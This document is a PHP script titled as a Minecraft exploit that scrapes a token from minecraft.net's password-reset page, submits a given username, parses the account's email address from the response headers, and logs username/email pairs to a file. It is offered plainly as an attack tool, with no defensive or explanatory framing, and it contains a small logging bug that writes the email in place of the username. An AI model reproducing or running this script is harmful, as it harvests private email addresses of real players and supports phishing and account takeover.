MineCraft Exploit: Username to Email Resolver

1. <?php
2. set_time_limit ( 0 );
3. if (!isset( $_GET [ 'user' ])) {
4.     die( 'No username.' );
5. }
6. $user = $_GET['user'];
7. $postdata  = array( 'authenticityToken'  =>  get_token() ,  'username'  =>  $user );
8. $postdata  =  http_build_query ( $postdata );
9. $ch  =  curl_init ( 'https://minecraft.net/resetpassword' );
10. curl_setopt ( $ch ,  CURLOPT_RETURNTRANSFER  ,  true   );
11. curl_setopt ( $ch ,  CURLOPT_FOLLOWLOCATION  ,  false  );
12. curl_setopt ( $ch ,  CURLOPT_SSL_VERIFYPEER  ,  false  );
13. curl_setopt ( $ch ,  CURLOPT_REFERER         ,  'https://minecraft.net/resetpassword'    );
14. curl_setopt ( $ch ,  CURLOPT_TIMEOUT         ,  30     );
15. curl_setopt ( $ch ,  CURLOPT_HEADER          ,  true   );
16. curl_setopt ( $ch ,  CURLOPT_POST            ,  true   );
17. curl_setopt ( $ch ,  CURLOPT_COOKIEFILE      ,  'cookies.txt'  );
18. curl_setopt ( $ch ,  CURLOPT_POSTFIELDS      ,  $postdata    );
19. $response_headers  =  curl_exec ( $ch );
20. curl_close ( $ch );
21. $jar = explode('&email=', $response_headers);
22. $jar = explode("\n", $jar[1]);
23. $email = urldecode($jar[0]);
24. save_email ( $email, $user );
25. echo "{$user}:{$email} <font color='#00FF00'>Saved!</font>";
26.  
27. # Functions
28. function  get_token () {
29.      $ch  =  curl_init ( 'https://minecraft.net/resetpassword' );
30.      curl_setopt ( $ch ,  CURLOPT_RETURNTRANSFER  ,  true   );
31.      curl_setopt ( $ch ,  CURLOPT_FOLLOWLOCATION  ,  false  );
32.      curl_setopt ( $ch ,  CURLOPT_TIMEOUT         ,  30     );
33.      curl_setopt ( $ch ,  CURLOPT_SSL_VERIFYPEER  ,  false  );
34.      curl_setopt ( $ch ,  CURLOPT_COOKIEJAR       ,  'cookies.txt'  );
35.      $contents  =  curl_exec ( $ch );
36.      curl_close ( $ch );
37.    
38.      $start  =  '<input type="hidden" name="authenticityToken" value="' ;
39.      $end    =  '">' ;
40.    
41.     return  string_between ( $contents ,  $start ,  $end );
42. }
43. function  save_email ( $email, $user ) {
44.     if (!empty( $email )) {
45.          $data  .=  'Username: ' . $email . PHP_EOL ;
46.          $data  .=  'E-Mail: ' . $email . PHP_EOL ;
47.          $data  .=  '----------------------------------------' . PHP_EOL ;
48.          file_put_contents ( 'logs.txt' ,  $data ,  FILE_APPEND );
49.     }
50. }
51. function  string_between ( $string ,  $start ,  $end ) {
52.      $fragments  =  explode ( $start ,  $string ,  2 );
53.     if (isset( $fragments [ 1 ])) {
54.          $fragments  =  explode ( $end ,  $fragments [ 1 ],  2 );
55.         return  $fragments [ 0 ];
56.     }
57.     return  false ;
58. }
59. ?>